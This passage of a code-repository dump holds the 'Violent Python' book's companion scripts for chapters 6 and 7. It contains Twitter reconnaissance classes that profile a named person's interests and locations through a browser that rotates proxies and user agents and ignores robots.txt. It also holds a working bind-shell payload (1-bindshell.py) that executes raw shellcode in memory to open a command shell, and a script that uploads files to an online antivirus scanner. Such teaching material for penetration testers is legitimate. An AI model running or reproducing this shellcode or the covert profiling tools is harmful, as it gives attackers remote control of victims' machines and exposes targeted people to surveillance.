HashTags.' 93 | for hashtag in set(interests['hashtags']): 94 | print ' [+] ' + str(hashtag) 95 | 96 | 97 | if __name__ == '__main__': 98 | main() 99 | 100 | -------------------------------------------------------------------------------- /CH6/9-twitterRecon.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import json 4 | import urllib 5 | from anonBrowser import * 6 | 7 | class reconPerson: 8 | 9 | def __init__(self,first_name,last_name,\ 10 | job='',social_media={}): 11 | self.first_name = first_name 12 | self.last_name = last_name 13 | self.job = job 14 | self.social_media = social_media 15 | 16 | def __repr__(self): 17 | return self.first_name + ' ' +\ 18 | self.last_name + ' has job ' + self.job 19 | 20 | def get_social(self, media_name): 21 | if self.social_media.has_key(media_name): 22 | return self.social_media[media_name] 23 | 24 | return None 25 | 26 | def query_twitter(self, query): 27 | query = urllib.quote_plus(query) 28 | results = [] 29 | browser = anonBrowser() 30 | response = browser.open(\ 31 | 'http://search.twitter.com/search.json?q='+ query) 32 | json_objects = json.load(response) 33 | for result in json_objects['results']: 34 | new_result = {} 35 | new_result['from_user'] = result['from_user_name'] 36 | new_result['geo'] = result['geo'] 37 | new_result['tweet'] = result['text'] 38 | results.append(new_result) 39 | 40 | return results 41 | 42 | 43 | ap = reconPerson('Boondock', 'Saint') 44 | print ap.query_twitter(\ 45 | 'from:th3j35t3r since:2010-01-01 include:retweets') 46 | 47 | -------------------------------------------------------------------------------- /CH6/anonBrowser.py: -------------------------------------------------------------------------------- 1 | import mechanize, cookielib, random 2 | 3 | class anonBrowser(mechanize.Browser): 4 | 5 | def __init__(self, proxies = [], user_agents = []): 6 | mechanize.Browser.__init__(self) 7 | self.set_handle_robots(False) 8 | self.proxies = proxies 9 | self.user_agents = user_agents + ['Mozilla/4.0 ',\ 10 | 'FireFox/6.01','ExactSearch', 'Nokia7110/1.0'] 11 | 12 | self.cookie_jar = cookielib.LWPCookieJar() 13 | self.set_cookiejar(self.cookie_jar) 14 | self.anonymize() 15 | 16 | def clear_cookies(self): 17 | self.cookie_jar = cookielib.LWPCookieJar() 18 | self.set_cookiejar(self.cookie_jar) 19 | 20 | def change_user_agent(self): 21 | index = random.randrange(0, len(self.user_agents) ) 22 | self.addheaders = [('User-agent', \ 23 | ( self.user_agents[index] ))] 24 | 25 | def change_proxy(self): 26 | if self.proxies: 27 | index = random.randrange(0, len(self.proxies)) 28 | self.set_proxies( {'http': self.proxies[index]} ) 29 | 30 | def anonymize(self, sleep = False): 31 | self.clear_cookies() 32 | self.change_user_agent() 33 | self.change_proxy() 34 | 35 | if sleep: 36 | time.sleep(60) 37 | 38 | -------------------------------------------------------------------------------- /CH6/anonBrowser.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH6/anonBrowser.pyc -------------------------------------------------------------------------------- /CH6/mlb-cities.txt: -------------------------------------------------------------------------------- 1 | baltimore 2 | boston 3 | chicago 4 | cleveland 5 | detroit 6 | kansas city 7 | los angeles 8 | minnesota 9 | new york 10 | oakland 11 | seattle 12 | tampa 13 | arlington 14 | toronto 15 | phoenix 16 | atlanta 17 | chicao 18 | cincinnati 19 | denver 20 | houston 21 | miami 22 | milwaukee 23 | philadelphia 24 | pittsburg 25 | san diego 26 | san francisco 27 | st louis 28 | washington 29 | -------------------------------------------------------------------------------- /CH6/twitterClass.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import urllib 4 | from anonBrowser import * 5 | import json 6 | import re 7 | import urllib2 8 | 9 | 10 | class reconPerson: 11 | 12 | def __init__(self, handle): 13 | self.handle = handle 14 | self.tweets = self.get_tweets() 15 | 16 | def get_tweets(self): 17 | query = urllib.quote_plus('from:' + self.handle+\ 18 | ' since:2009-01-01 include:retweets' 19 | ) 20 | tweets = [] 21 | browser = anonBrowser() 22 | browser.anonymize() 23 | response = browser.open('http://search.twitter.com/'+\ 24 | 'search.json?q=' + query) 25 | 26 | json_objects = json.load(response) 27 | for result in json_objects['results']: 28 | new_result = {} 29 | new_result['from_user'] = result['from_user_name'] 30 | new_result['geo'] = result['geo'] 31 | new_result['tweet'] = result['text'] 32 | tweets.append(new_result) 33 | return tweets 34 | 35 | def find_interests(self): 36 | interests = {} 37 | interests['links'] = [] 38 | interests['users'] = [] 39 | interests['hashtags'] = [] 40 | 41 | for tweet in self.tweets: 42 | text = tweet['tweet'] 43 | links = re.compile('(http.*?)\Z|(http.*?) ').findall(text) 44 | 45 | for link in links: 46 | if link[0]: 47 | link = link[0] 48 | elif link[1]: 49 | link = link[1] 50 | else: 51 | continue 52 | 53 | try: 54 | response = urllib2.urlopen(link) 55 | full_link = response.url 56 | interests['links'].append(full_link) 57 | except: 58 | pass 59 | interests['users'] +=\ 60 | re.compile('(@\w+)').findall(text) 61 | interests['hashtags'] +=\ 62 | re.compile('(#\w+)').findall(text) 63 | 64 | interests['users'].sort() 65 | interests['hashtags'].sort() 66 | interests['links'].sort() 67 | return interests 68 | 69 | def twitter_locate(self, cityFile): 70 | cities = [] 71 | if cityFile != None: 72 | for line in open(cityFile).readlines(): 73 | city = line.strip('\n').strip('\r').lower() 74 | cities.append(city) 75 | 76 | locations = [] 77 | locCnt = 0 78 | cityCnt = 0 79 | tweetsText = '' 80 | 81 | for tweet in self.tweets: 82 | if tweet['geo'] != None: 83 | locations.append(tweet['geo']) 84 | locCnt += 1 85 | 86 | tweetsText += tweet['tweet'].lower() 87 | 88 | for city in cities: 89 | if city in tweetsText: 90 | locations.append(city) 91 | cityCnt += 1 92 | 93 | return locations 94 | 95 | 96 | -------------------------------------------------------------------------------- /CH7/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/CH7/.DS_Store -------------------------------------------------------------------------------- /CH7/1-bindshell.py: -------------------------------------------------------------------------------- 1 | from ctypes import * 2 | 3 | shellcode = ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" 4 | "\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" 5 | "\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2" 6 | "\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" 7 | "\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3" 8 | "\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" 9 | "\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58" 10 | "\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" 11 | "\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff" 12 | "\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x68\x33\x32\x00\x00\x68" 13 | "\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01" 14 | "\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50" 15 | "\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x89\xc7" 16 | "\x31\xdb\x53\x68\x02\x00\x05\x39\x89\xe6\x6a\x10\x56\x57\x68" 17 | "\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" 18 | "\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x89\xc7\x68\x75" 19 | "\x6e\x4d\x61\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57" 20 | "\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01" 21 | "\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" 22 | "\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56" 23 | "\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56" 24 | "\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75" 25 | "\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5"); 26 | 27 | memorywithshell = create_string_buffer(shellcode, len(shellcode)) 28 | shell = cast(memorywithshell, CFUNCTYPE(c_void_p)) 29 | shell() 30 | 31 | -------------------------------------------------------------------------------- /CH7/2-virusCheck.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding: utf-8 -*- 3 | import re 4 | import httplib 5 | import time 6 | import os 7 | import optparse 8 | from urlparse import urlparse 9 | 10 | 11 | def printResults(url): 12 | 13 | status = 200 14 | host = urlparse(url)[1] 15 | path = urlparse(url)[2] 16 | 17 | if 'analysis' not in path: 18 | while status != 302: 19 | conn = httplib.HTTPConnection(host) 20 | conn.request('GET', path) 21 | resp = conn.getresponse() 22 | status = resp.status 23 | print '[+] Scanning file...' 24 | conn.close() 25 | time.sleep(15) 26 | 27 | print '[+] Scan Complete.' 28 | path = path.replace('file', 'analysis') 29 | conn = httplib.HTTPConnection(host) 30 | conn.request('GET', path) 31 | resp = conn.getresponse() 32 | data = resp.read() 33 | conn.close() 34 | 35 | reResults = re.findall(r'Detection rate:.*\)', data) 36 | htmlStripRes = reResults[1].\ 37 | replace('<font color=\'red\'>', '').\ 38 | replace('</font>', '') 39 | print '[+] ' + str(htmlStripRes) 40 | 41 | 42 | def uploadFile(fileName): 43 | 44 | print "[+] Uploading file to NoVirusThanks..." 45 | fileContents = open(fileName,'rb').read() 46 | 47 | header = {'Content-Type': 'multipart/form-data; \ 48 | boundary=----WebKitFormBoundaryF17rwCZdGuPNPT9U'} 49 | 50 | params = "------WebKitFormBoundaryF17rwCZdGuPNPT9U" 51 | params += "\r\nContent-Disposition: form-data; "+\ 52 | "name=\"upfile\"; filename=\""+str(fileName)+"\"" 53 | params += "\r\nContent-Type: "+\ 54 | "application/octet stream\r\n\r\n" 55 | params += fileContents 56 | params += "\r\n------WebKitFormBoundaryF17rwCZdGuPNPT9U" 57 | params += "\r\nContent-Disposition: form-data; "+\ 58 | "name=\"submitfile\"\r\n" 59 | params += "\r\nSubmit File\r\n" 60 | params +="------WebKitFormBoundaryF17rwCZdGuPNPT9U--\r\n" 61 | conn = httplib.HTTPConnection('vscan.novirusthanks.org') 62 | conn.request("POST", "/", params, header) 63 | response = conn.getresponse() 64 | location = response.getheader('location') 65 | conn.close() 66 | return location 67 | 68 | 69 | def main(): 70 | 71 | parser = optparse.OptionParser('usage %prog -f ') 72 | parser.add_option('-f', dest='fileName', type='string',\ 73 | help='specify filename') 74 | (options, args) = parser.parse_args() 75 | fileName = options.fileName 76 | 77 | if fileName == None: 78 | print parser.usage 79 | exit(0) 80 | elif os.path.isfile(fileName) == False: 81 | print '[+] ' + fileName + ' does not exist.' 82 | exit(0) 83 | else: 84 | loc = uploadFile(fileName) 85 | printResults(loc) 86 | 87 | 88 | if __name__ == '__main__': 89 | main() 90 | 91 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Violent Python scripts 2 | 3 | Some of the scripts are updated for python3 support 4 | 5 | Rest will be done soon. 6 | -------------------------------------------------------------------------------- /Violent Python - A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hmaverickadams/Violent-Python-Companion-Files/34b31de387e2ce152ee6f9320d2bad4451c91267/Violent Python - A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers.pdf --------------------------------------------------------------------------------